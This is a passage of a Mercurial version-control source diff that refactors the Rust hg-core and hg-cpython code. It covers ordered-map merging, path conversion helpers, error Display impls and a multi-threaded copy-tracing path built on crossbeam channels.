+ // Here `left` is more than twice the size of `right`,
+ // so the number of differences is more than the total size of
+ // `right`. Therefore an algorithm based on iterating `right`
+ // is more efficient.
+ //
+ // This helps a lot when a tiny (or empty) map is merged
+ // with a large one.
+ ordmap_union_with_merge_by_iter(left, right, merge)
+ } else if left.len() < right.len() / 2 {
+ // Same as above but with `left` and `right` swapped
+ ordmap_union_with_merge_by_iter(right, left, |key, a, b| {
+ // Also swapped in `merge` arguments:
+ match merge(key, b, a) {
+ MergeResult::UseNewValue(v) => MergeResult::UseNewValue(v),
+ // … and swap back in `merge` result:
+ MergeResult::UseLeftValue => MergeResult::UseRightValue,
+ MergeResult::UseRightValue => MergeResult::UseLeftValue,
+ }
+ })
+ } else {
+ // For maps of similar size, use the algorithm based on `OrdMap::diff`
+ ordmap_union_with_merge_by_diff(left, right, merge)
+ }
+}
+
+/// Efficient if `right` is much smaller than `left`
+fn ordmap_union_with_merge_by_iter<K, V>(
+ mut left: OrdMap<K, V>,
+ right: OrdMap<K, V>,
+ mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>,
+) -> OrdMap<K, V>
+where
+ K: Clone + Ord,
+ V: Clone,
+{
+ for (key, right_value) in right {
+ match left.get(&key) {
+ None => {
+ left.insert(key, right_value);
+ }
+ Some(left_value) => match merge(&key, left_value, &right_value) {
+ MergeResult::UseLeftValue => {}
+ MergeResult::UseRightValue => {
+ left.insert(key, right_value);
+ }
+ MergeResult::UseNewValue(new_value) => {
+ left.insert(key, new_value);
+ }
+ },
+ }
+ }
+ left
+}
+
+/// Fallback when both maps are of similar size
+fn ordmap_union_with_merge_by_diff<K, V>(
+ mut left: OrdMap<K, V>,
+ mut right: OrdMap<K, V>,
+ mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>,
+) -> OrdMap<K, V>
+where
+ K: Clone + Ord,
+ V: Clone + PartialEq,
+{
+ // (key, value) pairs that would need to be inserted in either map
+ // in order to turn it into the union.
+ //
+ // TODO: if/when https://github.com/bodil/im-rs/pull/168 is accepted,
+ // change these from `Vec<(K, V)>` to `Vec<(&K, Cow<V>)>`
+ // with `left_updates` only borrowing from `right` and `right_updates` from
+ // `left`, and with `Cow::Owned` used for `MergeResult::UseNewValue`.
+ //
+ // This would allow moving all `.clone()` calls to after we’ve decided
+ // which of `right_updates` or `left_updates` to use
+ // (value ones becoming `Cow::into_owned`),
+ // and avoid making clones we don’t end up using.
+ let mut left_updates = Vec::new();
+ let mut right_updates = Vec::new();
+
+ for difference in left.diff(&right) {
+ match difference {
+ DiffItem::Add(key, value) => {
+ left_updates.push((key.clone(), value.clone()))
+ }
+ DiffItem::Remove(key, value) => {
+ right_updates.push((key.clone(), value.clone()))
+ }
+ DiffItem::Update {
+ old: (key, left_value),
+ new: (_, right_value),
+ } => match merge(key, left_value, right_value) {
+ MergeResult::UseLeftValue => {
+ right_updates.push((key.clone(), left_value.clone()))
+ }
+ MergeResult::UseRightValue => {
+ left_updates.push((key.clone(), right_value.clone()))
+ }
+ MergeResult::UseNewValue(new_value) => {
+ left_updates.push((key.clone(), new_value.clone()));
+ right_updates.push((key.clone(), new_value))
+ }
+ },
+ }
+ }
+ if left_updates.len() < right_updates.len() {
+ for (key, value) in left_updates {
+ left.insert(key, value);
+ }
+ left
+ } else {
+ for (key, value) in right_updates {
+ right.insert(key, value);
+ }
+ right
+ }
+}
+
+/// Join items of the iterable with the given separator, similar to Python’s
+/// `separator.join(iter)`.
+///
+/// Formatting the return value consumes the iterator.
+/// Formatting it again will produce an empty string.
+pub fn join_display(
+ iter: impl IntoIterator<Item = impl fmt::Display>,
+ separator: impl fmt::Display,
+) -> impl fmt::Display {
+ JoinDisplay {
+ iter: Cell::new(Some(iter.into_iter())),
+ separator,
+ }
+}
+
+struct JoinDisplay<I, S> {
+ iter: Cell<Option<I>>,
+ separator: S,
+}
+
+impl<I, T, S> fmt::Display for JoinDisplay<I, S>
+where
+ I: Iterator<Item = T>,
+ T: fmt::Display,
+ S: fmt::Display,
+{
+ fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+ if let Some(mut iter) = self.iter.take() {
+ if let Some(first) = iter.next() {
+ first.fmt(f)?;
+ }
+ for value in iter {
+ self.separator.fmt(f)?;
+ value.fmt(f)?;
+ }
+ }
+ Ok(())
+ }
+}
--- a/rust/hg-core/src/utils/files.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/utils/files.rs Tue Apr 20 11:01:06 2021 -0400
@@ -17,13 +17,13 @@
use lazy_static::lazy_static;
use same_file::is_same_file;
use std::borrow::{Cow, ToOwned};
+use std::ffi::OsStr;
use std::fs::Metadata;
-use std::io::Read;
use std::iter::FusedIterator;
use std::ops::Deref;
use std::path::{Path, PathBuf};
-pub fn get_path_from_bytes(bytes: &[u8]) -> &Path {
+pub fn get_os_str_from_bytes(bytes: &[u8]) -> &OsStr {
let os_str;
#[cfg(unix)]
{
@@ -33,16 +33,24 @@
// TODO Handle other platforms
// TODO: convert from WTF8 to Windows MBCS (ANSI encoding).
// Perhaps, the return type would have to be Result<PathBuf>.
+ os_str
+}
- Path::new(os_str)
+pub fn get_path_from_bytes(bytes: &[u8]) -> &Path {
+ Path::new(get_os_str_from_bytes(bytes))
}
// TODO: need to convert from WTF8 to MBCS bytes on Windows.
// that's why Vec<u8> is returned.
#[cfg(unix)]
pub fn get_bytes_from_path(path: impl AsRef<Path>) -> Vec<u8> {
+ get_bytes_from_os_str(path.as_ref())
+}
+
+#[cfg(unix)]
+pub fn get_bytes_from_os_str(str: impl AsRef<OsStr>) -> Vec<u8> {
use std::os::unix::ffi::OsStrExt;
- path.as_ref().as_os_str().as_bytes().to_vec()
+ str.as_ref().as_bytes().to_vec()
}
/// An iterator over repository path yielding itself and its ancestors.
@@ -191,6 +199,12 @@
st_ctime: metadata.ctime(),
}
}
+
+ pub fn is_symlink(&self) -> bool {
+ // This is way too manual, but `HgMetadata` will go away in the
+ // near-future dirstate rewrite anyway.
+ self.st_mode & 0170000 == 0120000
+ }
}
/// Returns the canonical path of `name`, given `cwd` and `root`
@@ -276,7 +290,13 @@
if cwd.as_ref().is_empty() {
Cow::Borrowed(path.as_bytes())
} else {
- let mut res: Vec<u8> = Vec::new();
+ // This is not all accurate as to how large `res` will actually be, but
+ // profiling `rhg files` on a large-ish repo shows it’s better than
+ // starting from a zero-capacity `Vec` and letting `extend` reallocate
+ // repeatedly.
+ let guesstimate = path.as_bytes().len();
+
+ let mut res: Vec<u8> = Vec::with_capacity(guesstimate);
let mut path_iter = path.as_bytes().split(|b| *b == b'/').peekable();
let mut cwd_iter =
cwd.as_ref().as_bytes().split(|b| *b == b'/').peekable();
@@ -309,17 +329,6 @@
}
}
-/// Reads a file in one big chunk instead of doing multiple reads
-pub fn read_whole_file(filepath: &Path) -> std::io::Result<Vec<u8>> {
- let mut file = std::fs::File::open(filepath)?;
- let size = file.metadata()?.len();
-
- let mut res = vec![0; size as usize];
- file.read_exact(&mut res)?;
-
- Ok(res)
-}
-
#[cfg(test)]
mod tests {
use super::*;
--- a/rust/hg-core/src/utils/hg_path.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/utils/hg_path.rs Tue Apr 20 11:01:06 2021 -0400
@@ -47,57 +47,68 @@
},
}
-impl ToString for HgPathError {
- fn to_string(&self) -> String {
+impl fmt::Display for HgPathError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
HgPathError::LeadingSlash(bytes) => {
- format!("Invalid HgPath '{:?}': has a leading slash.", bytes)
+ write!(f, "Invalid HgPath '{:?}': has a leading slash.", bytes)
}
HgPathError::ConsecutiveSlashes {
bytes,
second_slash_index: pos,
- } => format!(
+ } => write!(
+ f,
"Invalid HgPath '{:?}': consecutive slashes at pos {}.",
bytes, pos
),
HgPathError::ContainsNullByte {
bytes,
null_byte_index: pos,
- } => format!(
+ } => write!(
+ f,
"Invalid HgPath '{:?}': contains null byte at pos {}.",
bytes, pos
),
- HgPathError::DecodeError(bytes) => {
- format!("Invalid HgPath '{:?}': could not be decoded.", bytes)
- }
+ HgPathError::DecodeError(bytes) => write!(
+ f,
+ "Invalid HgPath '{:?}': could not be decoded.",
+ bytes
+ ),
HgPathError::EndsWithSlash(path) => {
- format!("Audit failed for '{}': ends with a slash.", path)
+ write!(f, "Audit failed for '{}': ends with a slash.", path)
}
- HgPathError::ContainsIllegalComponent(path) => format!(
+ HgPathError::ContainsIllegalComponent(path) => write!(
+ f,
"Audit failed for '{}': contains an illegal component.",
path
),
- HgPathError::InsideDotHg(path) => format!(
+ HgPathError::InsideDotHg(path) => write!(
+ f,
"Audit failed for '{}': is inside the '.hg' folder.",
path
),
HgPathError::IsInsideNestedRepo {
path,
nested_repo: nested,
- } => format!(
+ } => {
+ write!(f,
"Audit failed for '{}': is inside a nested repository '{}'.",
path, nested
- ),
- HgPathError::TraversesSymbolicLink { path, symlink } => format!(
+ )
+ }
+ HgPathError::TraversesSymbolicLink { path, symlink } => write!(
+ f,
"Audit failed for '{}': traverses symbolic link '{}'.",
path, symlink
),
- HgPathError::NotFsCompliant(path) => format!(
+ HgPathError::NotFsCompliant(path) => write!(
+ f,
"Audit failed for '{}': cannot be turned into a \
filesystem path.",
path
),
- HgPathError::NotUnderRoot { path, root } => format!(
+ HgPathError::NotUnderRoot { path, root } => write!(
+ f,
"Audit failed for '{}': not under root {}.",
path.display(),
root.display()
@@ -367,7 +378,9 @@
}
}
-#[derive(Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash)]
+#[derive(
+ Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash, derive_more::From,
+)]
pub struct HgPathBuf {
inner: Vec<u8>,
}
@@ -408,12 +421,6 @@
}
}
-impl From<Vec<u8>> for HgPathBuf {
- fn from(vec: Vec<u8>) -> Self {
- Self { inner: vec }
- }
-}
-
impl<T: ?Sized + AsRef<HgPath>> From<&T> for HgPathBuf {
fn from(s: &T) -> HgPathBuf {
s.as_ref().to_owned()
--- a/rust/hg-cpython/Cargo.toml Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/Cargo.toml Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,6 @@
[features]
default = ["python27"]
-dirstate-tree = ["hg-core/dirstate-tree"]
# Features to build an extension module:
python27 = ["cpython/python27-sys", "cpython/extension-module-2-7"]
@@ -22,11 +21,12 @@
python3-bin = ["cpython/python3-sys"]
[dependencies]
+crossbeam-channel = "0.4"
hg-core = { path = "../hg-core"}
libc = '*'
log = "0.4.8"
env_logger = "0.7.1"
[dependencies.cpython]
-version = "0.4.1"
+version = "0.5.2"
default-features = false
--- a/rust/hg-cpython/src/copy_tracing.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/copy_tracing.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
use cpython::ObjectProtocol;
-use cpython::PyBool;
use cpython::PyBytes;
use cpython::PyDict;
+use cpython::PyDrop;
use cpython::PyList;
use cpython::PyModule;
use cpython::PyObject;
@@ -9,13 +9,63 @@
use cpython::PyTuple;
use cpython::Python;
-use hg::copy_tracing::combine_changeset_copies;
use hg::copy_tracing::ChangedFiles;
-use hg::copy_tracing::DataHolder;
-use hg::copy_tracing::RevInfo;
-use hg::copy_tracing::RevInfoMaker;
+use hg::copy_tracing::CombineChangesetCopies;
use hg::Revision;
+use self::pybytes_with_data::PyBytesWithData;
+
+// Module to encapsulate private fields
+mod pybytes_with_data {
+ use cpython::{PyBytes, Python};
+
+ /// Safe abstraction over a `PyBytes` together with the `&[u8]` slice
+ /// that borrows it.
+ ///
+ /// Calling `PyBytes::data` requires a GIL marker but we want to access the
+ /// data in a thread that (ideally) does not need to acquire the GIL.
+ /// This type allows separating the call an the use.
+ pub(super) struct PyBytesWithData {
+ #[allow(unused)]
+ keep_alive: PyBytes,
+
+ /// Borrows the buffer inside `self.keep_alive`,
+ /// but the borrow-checker cannot express self-referential structs.
+ data: *const [u8],
+ }
+
+ fn require_send<T: Send>() {}
+
+ #[allow(unused)]
+ fn static_assert_pybytes_is_send() {
+ require_send::<PyBytes>;
+ }
+
+ // Safety: PyBytes is Send. Raw pointers are not by default,
+ // but here sending one to another thread is fine since we ensure it stays
+ // valid.
+ unsafe impl Send for PyBytesWithData {}
+
+ impl PyBytesWithData {
+ pub fn new(py: Python, bytes: PyBytes) -> Self {
+ Self {
+ data: bytes.data(py),
+ keep_alive: bytes,
+ }
+ }
+
+ pub fn data(&self) -> &[u8] {
+ // Safety: the raw pointer is valid as long as the PyBytes is still
+ // alive, and the returned slice borrows `self`.
+ unsafe { &*self.data }
+ }
+
+ pub fn unwrap(self) -> PyBytes {
+ self.keep_alive
+ }
+ }
+}
+
/// Combines copies information contained into revision `revs` to build a copy
/// map.
///
@@ -26,88 +76,135 @@
children_count: PyDict,
target_rev: Revision,
rev_info: PyObject,
- is_ancestor: PyObject,
+ multi_thread: bool,
) -> PyResult<PyDict> {
- let revs: PyResult<_> =
- revs.iter(py).map(|r| Ok(r.extract(py)?)).collect();
-
- // Wrap the `is_ancestor` python callback as a Rust closure
- //
- // No errors are expected from the Python side, and they will should only
- // happens in case of programing error or severe data corruption. Such
- // errors will raise panic and the rust-cpython harness will turn them into
- // Python exception.
- let is_ancestor_wrap = |anc: Revision, desc: Revision| -> bool {
- is_ancestor
- .call(py, (anc, desc), None)
- .expect(
- "rust-copy-tracing: python call to `is_ancestor` \
- failed",
- )
- .cast_into::<PyBool>(py)
- .expect(
- "rust-copy-tracing: python call to `is_ancestor` \
- returned unexpected non-Bool value",
- )
- .is_true()
- };
-
- // Wrap the `rev_info_maker` python callback as a Rust closure
- //
- // No errors are expected from the Python side, and they will should only
- // happens in case of programing error or severe data corruption. Such
- // errors will raise panic and the rust-cpython harness will turn them into
- // Python exception.
- let rev_info_maker: RevInfoMaker<PyBytes> =
- Box::new(|rev: Revision, d: &mut DataHolder<PyBytes>| -> RevInfo {
- let res: PyTuple = rev_info
- .call(py, (rev,), None)
- .expect("rust-copy-tracing: python call to `rev_info` failed")
- .cast_into(py)
- .expect(
- "rust-copy_tracing: python call to `rev_info` returned \
- unexpected non-Tuple value",
- );
- let p1 = res.get_item(py, 0).extract(py).expect(
- "rust-copy-tracing: rev_info return is invalid, first item \
- is a not a revision",
- );
- let p2 = res.get_item(py, 1).extract(py).expect(
- "rust-copy-tracing: rev_info return is invalid, first item \
- is a not a revision",
- );
-
- let files = match res.get_item(py, 2).extract::<PyBytes>(py) {
- Ok(raw) => {
- // Give responsability for the raw bytes lifetime to
- // hg-core
- d.data = Some(raw);
- let addrs = d.data.as_ref().expect(
- "rust-copy-tracing: failed to get a reference to the \
- raw bytes for copy data").data(py);
- ChangedFiles::new(addrs)
- }
- // value was presumably None, meaning they was no copy data.
- Err(_) => ChangedFiles::new_empty(),
- };
-
- (p1, p2, files)
- });
- let children_count: PyResult<_> = children_count
+ let children_count = children_count
.items(py)
.iter()
.map(|(k, v)| Ok((k.extract(py)?, v.extract(py)?)))
- .collect();
+ .collect::<PyResult<_>>()?;
+
+ /// (Revision number, parent 1, parent 2, copy data for this revision)
+ type RevInfo<Bytes> = (Revision, Revision, Revision, Option<Bytes>);
+
+ let revs_info =
+ revs.iter(py).map(|rev_py| -> PyResult<RevInfo<PyBytes>> {
+ let rev = rev_py.extract(py)?;
+ let tuple: PyTuple =
+ rev_info.call(py, (rev_py,), None)?.cast_into(py)?;
+ let p1 = tuple.get_item(py, 0).extract(py)?;
+ let p2 = tuple.get_item(py, 1).extract(py)?;
+ let opt_bytes = tuple.get_item(py, 2).extract(py)?;
+ Ok((rev, p1, p2, opt_bytes))
+ });
+
+ let path_copies;
+ if !multi_thread {
+ let mut combine_changeset_copies =
+ CombineChangesetCopies::new(children_count);
+
+ for rev_info in revs_info {
+ let (rev, p1, p2, opt_bytes) = rev_info?;
+ let files = match &opt_bytes {
+ Some(bytes) => ChangedFiles::new(bytes.data(py)),
+ // Python None was extracted to Option::None,
+ // meaning there was no copy data.
+ None => ChangedFiles::new_empty(),
+ };
+
+ combine_changeset_copies.add_revision(rev, p1, p2, files)
+ }
+ path_copies = combine_changeset_copies.finish(target_rev)
+ } else {
+ // Use a bounded channel to provide back-pressure:
+ // if the child thread is slower to process revisions than this thread
+ // is to gather data for them, an unbounded channel would keep
+ // growing and eat memory.
+ //
+ // TODO: tweak the bound?
+ let (rev_info_sender, rev_info_receiver) =
+ crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000);
+
+ // This channel (going the other way around) however is unbounded.
+ // If they were both bounded, there might potentially be deadlocks
+ // where both channels are full and both threads are waiting on each
+ // other.
+ let (pybytes_sender, pybytes_receiver) =
+ crossbeam_channel::unbounded();
- let res = combine_changeset_copies(
- revs?,
- children_count?,
- target_rev,
- rev_info_maker,
- &is_ancestor_wrap,
- );
+ // Start a thread that does CPU-heavy processing in parallel with the
+ // loop below.
+ //
+ // If the parent thread panics, `rev_info_sender` will be dropped and
+ // “disconnected”. `rev_info_receiver` will be notified of this and
+ // exit its own loop.
+ let thread = std::thread::spawn(move || {
+ let mut combine_changeset_copies =
+ CombineChangesetCopies::new(children_count);
+ for (rev, p1, p2, opt_bytes) in rev_info_receiver {
+ let files = match &opt_bytes {
+ Some(raw) => ChangedFiles::new(raw.data()),
+ // Python None was extracted to Option::None,
+ // meaning there was no copy data.
+ None => ChangedFiles::new_empty(),
+ };
+ combine_changeset_copies.add_revision(rev, p1, p2, files);
+
+ // Send `PyBytes` back to the parent thread so the parent
+ // thread can drop it. Otherwise the GIL would be implicitly
+ // acquired here through `impl Drop for PyBytes`.
+ if let Some(bytes) = opt_bytes {
+ if let Err(_) = pybytes_sender.send(bytes.unwrap()) {
+ // The channel is disconnected, meaning the parent
+ // thread panicked or returned
+ // early through
+ // `?` to propagate a Python exception.
+ break;
+ }
+ }
+ }
+
+ combine_changeset_copies.finish(target_rev)
+ });
+
+ for rev_info in revs_info {
+ let (rev, p1, p2, opt_bytes) = rev_info?;
+ let opt_bytes = opt_bytes.map(|b| PyBytesWithData::new(py, b));
+
+ // We’d prefer to avoid the child thread calling into Python code,
+ // but this avoids a potential deadlock on the GIL if it does:
+ py.allow_threads(|| {
+ rev_info_sender.send((rev, p1, p2, opt_bytes)).expect(
+ "combine_changeset_copies: channel is disconnected",
+ );
+ });
+
+ // Drop anything in the channel, without blocking
+ for pybytes in pybytes_receiver.try_iter() {
+ pybytes.release_ref(py)
+ }
+ }
+ // We’d prefer to avoid the child thread calling into Python code,
+ // but this avoids a potential deadlock on the GIL if it does:
+ path_copies = py.allow_threads(|| {
+ // Disconnect the channel to signal the child thread to stop:
+ // the `for … in rev_info_receiver` loop will end.
+ drop(rev_info_sender);
+
+ // Wait for the child thread to stop, and propagate any panic.
+ thread.join().unwrap_or_else(|panic_payload| {
+ std::panic::resume_unwind(panic_payload)
+ })
+ });
+
+ // Drop anything left in the channel
+ for pybytes in pybytes_receiver.iter() {
+ pybytes.release_ref(py)
+ }
+ };
+
let out = PyDict::new(py);
- for (dest, source) in res.into_iter() {
+ for (dest, source) in path_copies.into_iter() {
out.set_item(
py,
PyBytes::new(py, &dest.into_vec()),
@@ -135,7 +232,7 @@
children: PyDict,
target_rev: Revision,
rev_info: PyObject,
- is_ancestor: PyObject
+ multi_thread: bool
)
),
)?;
--- a/rust/hg-cpython/src/dirstate.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/dirstate.rs Tue Apr 20 11:01:06 2021 -0400
@@ -24,10 +24,7 @@
exc, PyBytes, PyDict, PyErr, PyList, PyModule, PyObject, PyResult,
PySequence, Python,
};
-use hg::{
- utils::hg_path::HgPathBuf, DirstateEntry, DirstateParseError, EntryState,
- StateMap,
-};
+use hg::{utils::hg_path::HgPathBuf, DirstateEntry, EntryState, StateMap};
use libc::{c_char, c_int};
use std::convert::TryFrom;
@@ -79,11 +76,10 @@
.map(|(filename, stats)| {
let stats = stats.extract::<PySequence>(py)?;
let state = stats.get_item(py, 0)?.extract::<PyBytes>(py)?;
- let state = EntryState::try_from(state.data(py)[0]).map_err(
- |e: DirstateParseError| {
+ let state =
+ EntryState::try_from(state.data(py)[0]).map_err(|e| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
- },
- )?;
+ })?;
let mode = stats.get_item(py, 1)?.extract(py)?;
let size = stats.get_item(py, 2)?.extract(py)?;
let mtime = stats.get_item(py, 3)?.extract(py)?;
--- a/rust/hg-cpython/src/dirstate/dirs_multiset.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/dirstate/dirs_multiset.rs Tue Apr 20 11:01:06 2021 -0400
@@ -18,9 +18,9 @@
use crate::dirstate::extract_dirstate;
use hg::{
+ errors::HgError,
utils::hg_path::{HgPath, HgPathBuf},
- DirsMultiset, DirsMultisetIter, DirstateMapError, DirstateParseError,
- EntryState,
+ DirsMultiset, DirsMultisetIter, DirstateMapError, EntryState,
};
py_class!(pub class Dirs |py| {
@@ -38,7 +38,7 @@
skip_state = Some(
skip.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
);
@@ -46,7 +46,7 @@
let inner = if let Ok(map) = map.cast_as::<PyDict>(py) {
let dirstate = extract_dirstate(py, &map)?;
DirsMultiset::from_dirstate(&dirstate, skip_state)
- .map_err(|e| {
+ .map_err(|e: DirstateMapError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?
} else {
--- a/rust/hg-cpython/src/dirstate/dirstate_map.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs Tue Apr 20 11:01:06 2021 -0400
@@ -14,8 +14,8 @@
use cpython::{
exc, ObjectProtocol, PyBool, PyBytes, PyClone, PyDict, PyErr, PyList,
- PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject,
- UnsafePyLeaked,
+ PyObject, PyResult, PySet, PyString, PyTuple, Python, PythonObject,
+ ToPyObject, UnsafePyLeaked,
};
use crate::{
@@ -24,12 +24,14 @@
NonNormalEntries, NonNormalEntriesIterator,
},
dirstate::{dirs_multiset::Dirs, make_dirstate_tuple},
+ parsers::dirstate_parents_to_pytuple,
};
use hg::{
+ errors::HgError,
+ revlog::Node,
utils::hg_path::{HgPath, HgPathBuf},
DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap,
- DirstateMapError, DirstateParents, DirstateParseError, EntryState,
- StateMapIter, PARENT_SIZE,
+ DirstateMapError, DirstateParents, EntryState, StateMapIter,
};
// TODO
@@ -84,13 +86,13 @@
HgPath::new(f.extract::<PyBytes>(py)?.data(py)),
oldstate.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
DirstateEntry {
state: state.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
mode: mode.extract(py)?,
@@ -113,7 +115,7 @@
HgPath::new(f.extract::<PyBytes>(py)?.data(py)),
oldstate.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
size.extract(py)?,
@@ -137,7 +139,7 @@
HgPath::new(f.extract::<PyBytes>(py)?.data(py)),
oldstate.extract::<PyBytes>(py)?.data(py)[0]
.try_into()
- .map_err(|e: DirstateParseError| {
+ .map_err(|e: HgError| {
PyErr::new::<exc::ValueError, _>(py, e.to_string())
})?,
)
@@ -173,18 +175,11 @@
let (_, other_parent) =
inner_shared.get_non_normal_other_parent_entries();
- let locals = PyDict::new(py);
- locals.set_item(
- py,
- "other_parent",
- other_parent
- .iter()
- .map(|v| PyBytes::new(py, v.as_bytes()))
- .collect::<Vec<PyBytes>>()
- .to_py_object(py),
- )?;
-
- py.eval("set(other_parent)", None, Some(&locals))
+ let set = PySet::empty(py)?;
+ for path in other_parent.iter() {
+ set.add(py, PyBytes::new(py, path.as_bytes()))?;
+ }
+ Ok(set.into_object())
}
def non_normal_entries(&self) -> PyResult<NonNormalEntries> {
@@ -285,10 +280,7 @@
def parents(&self, st: PyObject) -> PyResult<PyTuple> {
self.inner(py).borrow_mut()
.parents(st.extract::<PyBytes>(py)?.data(py))
- .and_then(|d| {
- Ok((PyBytes::new(py, &d.p1), PyBytes::new(py, &d.p2))
- .to_py_object(py))
- })
+ .map(|parents| dirstate_parents_to_pytuple(py, parents))
.or_else(|_| {
Err(PyErr::new::<exc::OSError, _>(
py,
@@ -311,9 +303,8 @@
.read(st.extract::<PyBytes>(py)?.data(py))
{
Ok(Some(parents)) => Ok(Some(
- (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2))
- .to_py_object(py)
- .into_object(),
+ dirstate_parents_to_pytuple(py, parents)
+ .into_object()
)),
Ok(None) => Ok(Some(py.None())),
Err(_) => Err(PyErr::new::<exc::OSError, _>(
@@ -549,14 +540,12 @@
) -> Ref<'a, RustDirstateMap> {
self.inner(py).borrow()
}
- #[cfg(not(feature = "dirstate-tree"))]
fn translate_key(
py: Python,
res: (&HgPathBuf, &DirstateEntry),
) -> PyResult<Option<PyBytes>> {
Ok(Some(PyBytes::new(py, res.0.as_bytes())))
}
- #[cfg(not(feature = "dirstate-tree"))]
fn translate_key_value(
py: Python,
res: (&HgPathBuf, &DirstateEntry),
@@ -567,24 +556,6 @@
make_dirstate_tuple(py, &entry)?,
)))
}
- #[cfg(feature = "dirstate-tree")]
- fn translate_key(
- py: Python,
- res: (HgPathBuf, DirstateEntry),
- ) -> PyResult<Option<PyBytes>> {
- Ok(Some(PyBytes::new(py, res.0.as_bytes())))
- }
- #[cfg(feature = "dirstate-tree")]
- fn translate_key_value(
- py: Python,
- res: (HgPathBuf, DirstateEntry),
- ) -> PyResult<Option<(PyBytes, PyObject)>> {
- let (f, entry) = res;
- Ok(Some((
- PyBytes::new(py, f.as_bytes()),
- make_dirstate_tuple(py, &entry)?,
- )))
- }
}
py_shared_iterator!(
@@ -601,7 +572,7 @@
Option<(PyBytes, PyObject)>
);
-fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<[u8; PARENT_SIZE]> {
+fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<Node> {
let bytes = obj.extract::<PyBytes>(py)?;
match bytes.data(py).try_into() {
Ok(s) => Ok(s),
--- a/rust/hg-cpython/src/parsers.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/parsers.rs Tue Apr 20 11:01:06 2021 -0400
@@ -15,8 +15,7 @@
};
use hg::{
pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry,
- DirstatePackError, DirstateParents, DirstateParseError, FastHashMap,
- PARENT_SIZE,
+ DirstateParents, FastHashMap, PARENT_SIZE,
};
use std::convert::TryInto;
@@ -54,26 +53,9 @@
PyBytes::new(py, copy_path.as_bytes()),
)?;
}
- Ok(
- (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2))
- .to_py_object(py),
- )
+ Ok(dirstate_parents_to_pytuple(py, parents))
}
- Err(e) => Err(PyErr::new::<exc::ValueError, _>(
- py,
- match e {
- DirstateParseError::TooLittleData => {
- "too little data for parents".to_string()
- }
- DirstateParseError::Overflow => {
- "overflow in dirstate".to_string()
- }
- DirstateParseError::CorruptedEntry(e) => e,
- DirstateParseError::Damaged => {
- "dirstate appears to be damaged".to_string()
- }
- },
- )),
+ Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())),
}
}
@@ -128,18 +110,9 @@
}
Ok(PyBytes::new(py, &packed))
}
- Err(error) => Err(PyErr::new::<exc::ValueError, _>(
- py,
- match error {
- DirstatePackError::CorruptedParent => {
- "expected a 20-byte hash".to_string()
- }
- DirstatePackError::CorruptedEntry(e) => e,
- DirstatePackError::BadSize(expected, actual) => {
- format!("bad dirstate size: {} != {}", actual, expected)
- }
- },
- )),
+ Err(error) => {
+ Err(PyErr::new::<exc::ValueError, _>(py, error.to_string()))
+ }
}
}
@@ -179,3 +152,12 @@
Ok(m)
}
+
+pub(crate) fn dirstate_parents_to_pytuple(
+ py: Python,
+ parents: &DirstateParents,
+) -> PyTuple {
+ let p1 = PyBytes::new(py, parents.p1.as_bytes());
+ let p2 = PyBytes::new(py, parents.p2.as_bytes());
+ (p1, p2).to_py_object(py)
+}
--- a/rust/hg-cpython/src/revlog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-cpython/src/revlog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -12,13 +12,13 @@
use cpython::{
buffer::{Element, PyBuffer},
exc::{IndexError, ValueError},
- ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyModule, PyObject,
- PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject,
+ ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyInt, PyModule,
+ PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject,
};
use hg::{
nodemap::{Block, NodeMapError, NodeTree},
- revlog::{nodemap::NodeMap, RevlogIndex},
- NodeError, Revision,
+ revlog::{nodemap::NodeMap, NodePrefix, RevlogIndex},
+ Revision,
};
use std::cell::RefCell;
@@ -64,7 +64,7 @@
let nt = opt.as_ref().unwrap();
let idx = &*self.cindex(py).borrow();
let node = node_from_py_bytes(py, &node)?;
